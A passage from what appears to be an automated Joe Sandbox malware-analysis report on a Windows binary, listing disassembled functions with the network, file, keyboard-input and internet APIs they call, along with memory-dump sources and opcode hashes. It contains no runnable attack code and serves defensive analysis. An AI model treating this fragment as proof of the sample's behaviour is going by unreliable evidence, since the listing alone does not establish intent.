                                                                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1300846289-0
                                                                                                                      • Opcode ID: 92a0039afa613422a9baf8f44ea46b9b11959ddeb8bca311b63874a419058b52
                                                                                                                      • Instruction ID: dbe6d8f2edb353dcf68dc696d72c9a77ab39b7e0b087c50225b07c7e89ac37b9
                                                                                                                      • Opcode Fuzzy Hash: 92a0039afa613422a9baf8f44ea46b9b11959ddeb8bca311b63874a419058b52
                                                                                                                      • Instruction Fuzzy Hash: C902A171A00205EFCF09DF68C981AAEBBF5EF49300F14846AE806DB255EB35DE51CB95
                                                                                                                      Function 003F96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003FACD3: inet_addr.WS2_32(00000000), ref: 003FACF5
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 003F973D
                                                                                                                      • WSAGetLastError.WS2_32(00000000,00000000), ref: 003F9760
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4170576061-0
                                                                                                                      • Opcode ID: 7a757c9bb2ccbaee5546d72ae8e5e45602ae3568d520c2ff375a51ad570b1fb0
                                                                                                                      • Instruction ID: fb6b48cdc3bc05d063599703e3117967b529d425d2a70acb45b43dee95f6d4ac
                                                                                                                      • Opcode Fuzzy Hash: 7a757c9bb2ccbaee5546d72ae8e5e45602ae3568d520c2ff375a51ad570b1fb0
                                                                                                                      • Instruction Fuzzy Hash: F341E270A00204AFDB15AF24CC82EBEB7ECDF44328F548159FA16AF392CB749D018B91
                                                                                                                      Function 003EF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 003EF37A
                                                                                                                      • _wcscmp.LIBCMT ref: 003EF3AA
                                                                                                                      • _wcscmp.LIBCMT ref: 003EF3BF
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 003EF3D0
                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 003EF3FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2387731787-0
                                                                                                                      • Opcode ID: ffd3cad5c1205981a54d29cdc32e732358ceeebeee204045c678d82a1b09f481
                                                                                                                      • Instruction ID: 0e601543eb3f943896cbfeb5d2f758ff7d97e45011e9199cec9cb6140d98d8ff
                                                                                                                      • Opcode Fuzzy Hash: ffd3cad5c1205981a54d29cdc32e732358ceeebeee204045c678d82a1b09f481
                                                                                                                      • Instruction Fuzzy Hash: 8B418B356007019FC719DF29C490A9AB3E4FF49324F10462EE95ACB3A1DB71A941CF91
                                                                                                                      Function 003E4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003E439C
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 003E43B8
                                                                                                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003E4425
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 003E4483
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: 0befd373ccf54340ce71b65ab9f7555b9b36489945723b74fe1a1b6d4197eb33
                                                                                                                      • Instruction ID: 48650d07e8f0e4c82242a68589ffcf08d5279fafecd18d74b0a845e6172975e8
                                                                                                                      • Opcode Fuzzy Hash: 0befd373ccf54340ce71b65ab9f7555b9b36489945723b74fe1a1b6d4197eb33
                                                                                                                      • Instruction Fuzzy Hash: 5E411770F002A8AAEF329B6798087FD7BB9AB4D311F05035AF481976C1C7B489859B65
                                                                                                                      Function 0040EFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • GetCursorPos.USER32(?), ref: 0040EFE2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0041F3C3,?,?,?,?,?), ref: 0040EFF7
                                                                                                                      • GetCursorPos.USER32(?), ref: 0040F041
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0041F3C3,?,?,?), ref: 0040F077
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1423138444-0
                                                                                                                      • Opcode ID: a74e17d5891f7e2fb34713429e1f56a696caf455ee0664616477e68abff3d31e
                                                                                                                      • Instruction ID: 095f457700ccc4af4eba5b8e5f0f711b3d289019f7770ddd9256d1400eeb3672
                                                                                                                      • Opcode Fuzzy Hash: a74e17d5891f7e2fb34713429e1f56a696caf455ee0664616477e68abff3d31e
                                                                                                                      • Instruction Fuzzy Hash: B921F031600018AFCB258F64C898EEB7BB5EF49750F04407AF905A73A2D3349951DB95
                                                                                                                      Function 0040F0A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46nativewindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0041F352,?,?,?), ref: 0040F115
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0040F0FB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 1273190321-2594219639
                                                                                                                      • Opcode ID: 9ac6edbaa66d708cb340e242b903f635583db292c370ab1c9b6e9c589bc9e17a
                                                                                                                      • Instruction ID: c121de9e2e6ac95502dd09325e34f208ccaa8571f34a71cdbb80394b8588d377
                                                                                                                      • Opcode Fuzzy Hash: 9ac6edbaa66d708cb340e242b903f635583db292c370ab1c9b6e9c589bc9e17a
                                                                                                                      • Instruction Fuzzy Hash: B101DE31200204EBCB21AF14DC45FAA7BA6FBC5364F180139F9151F6E1C7B59C06DB99
                                                                                                                      Function 003E220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003E221E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen
                                                                                                                      • String ID: ($|
                                                                                                                      • API String ID: 1659193697-1631851259
                                                                                                                      • Opcode ID: 674531e27b92d5a5fc07dba7e37c1d6c959f7624295f9ed7318245cb93808130
                                                                                                                      • Instruction ID: 4c43670f175702fefd5d29cc23f310e9799ea3ef0342f6b5bedb21ffb52427be
                                                                                                                      • Opcode Fuzzy Hash: 674531e27b92d5a5fc07dba7e37c1d6c959f7624295f9ed7318245cb93808130
                                                                                                                      • Instruction Fuzzy Hash: BD324674A006459FC729CF2AC480A6AF7F4FF48310B12C56EE59ADB3A1D770E941CB44
                                                                                                                      Function 003BAD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 003BAE5E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongNtdllProc_Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2065330234-0
                                                                                                                      • Opcode ID: fe1321ca3048f25799f2df1d0ac662972c39be864a9b436e926e833e65288de8
                                                                                                                      • Instruction ID: bd754639b817f1fbf5e1e30f5e53a6b2f8d6b2340fe371bdb228731aba516d12
                                                                                                                      • Opcode Fuzzy Hash: fe1321ca3048f25799f2df1d0ac662972c39be864a9b436e926e833e65288de8
                                                                                                                      • Instruction Fuzzy Hash: 35A10770104E05BADB3AAE294C98DFF395CDB4134DB14453FFA02D6DA1DA29CC46A277
                                                                                                                      Function 003F550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003F4A1E,00000000), ref: 003F55FD
                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003F5629
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 599397726-0
                                                                                                                      • Opcode ID: 821a977b3f53013dbb02b510b1e0f23b9163784ef34551a9f6e0e1a4625ebf9b
                                                                                                                      • Instruction ID: 0e37aaca1193c79827fa279fdcf569c1024273313f45a6b2a28a9af2eb04c061
                                                                                                                      • Opcode Fuzzy Hash: 821a977b3f53013dbb02b510b1e0f23b9163784ef34551a9f6e0e1a4625ebf9b
                                                                                                                      • Instruction Fuzzy Hash: 0B41F471600A0DBFEB128E94CC85FBFB7BDEB41758F10402EF706A6181DA709E419B54
                                                                                                                      Function 003EEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003EEA95
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003EEAEF
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003EEB3C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1682464887-0
                                                                                                                      • Opcode ID: f576100030bca9d921814074c369e05f8decc97cb055a8989d8234defd3e682c
                                                                                                                      • Instruction ID: 800381125f1caa09decdbfa71a3d763c6d9bd5f6d0ea53c5bb57a88837487eb7
                                                                                                                      • Opcode Fuzzy Hash: f576100030bca9d921814074c369e05f8decc97cb055a8989d8234defd3e682c
                                                                                                                      • Instruction Fuzzy Hash: A2219035A00218EFCB00DFA5D884AEEFBB8FF49310F1480A9E905AB355DB31D915CB54
                                                                                                                      Function 003E702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003E704C
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003E708D
                                                                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003E7098
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 33631002-0
                                                                                                                      • Opcode ID: fb29351528e65289733b079f6dbe5b55a621d2d6051a663feb33288ed173377a
                                                                                                                      • Instruction ID: 13cc9c99aa4883024e8c41c99603fe52cdc8e477709ba4a5a61427c990cb372b
                                                                                                                      • Opcode Fuzzy Hash: fb29351528e65289733b079f6dbe5b55a621d2d6051a663feb33288ed173377a
                                                                                                                      • Instruction Fuzzy Hash: F0115E71E00228BFEB218F95DC45BAEBBBCEB45B10F104162F900E7290D7B05E058BA5
                                                                                                                      Function 003BAFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      • GetParent.USER32(?), ref: 0041F4B5
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,003BADDD,?,?,?,00000006,?), ref: 0041F52F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 314495775-0
                                                                                                                      • Opcode ID: 9bf477c6a4bb605ef3ad8257fe6841f4da42079de98119046fa6b504e4f0080c
                                                                                                                      • Instruction ID: 26e797779ad5181d92dbe079b96278e37bcac672e127f5823888f09d3b85dd89
                                                                                                                      • Opcode Fuzzy Hash: 9bf477c6a4bb605ef3ad8257fe6841f4da42079de98119046fa6b504e4f0080c
                                                                                                                      • Instruction Fuzzy Hash: 0721C131700104AFCB26AF28CC48AFB3BA6AB09368F184265F2254B6F2DBB05D52D715
                                                                                                                      Function 0040F45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0040F47D
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0041F42E,?,?,?,?,?), ref: 0040F4A6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientDialogNtdllProc_Screen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3420055661-0
                                                                                                                      • Opcode ID: d4896b88f397463d46a2659219f4f6380fac1168d384e481434ca5f5a5f47f77
                                                                                                                      • Instruction ID: 65c40623ca28381e3f5063dad39644b2db9fd31a0a3e9c1ba1447be99fa50f4f
                                                                                                                      • Opcode Fuzzy Hash: d4896b88f397463d46a2659219f4f6380fac1168d384e481434ca5f5a5f47f77
                                                                                                                      • Instruction Fuzzy Hash: 2FF05472900118FFEF049F55DC059BE7FB8FF44351F54402AF901A2160D3B5AA56DB64
                                                                                                                      Function 003ED712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003FC2E2,?,?,00000000,?), ref: 003ED73F
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003FC2E2,?,?,00000000,?), ref: 003ED751
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479602957-0
                                                                                                                      • Opcode ID: 5e03e59deea224d8c8af76ba73f9bc5bda11955daf59c28fee02351a4a742a5f
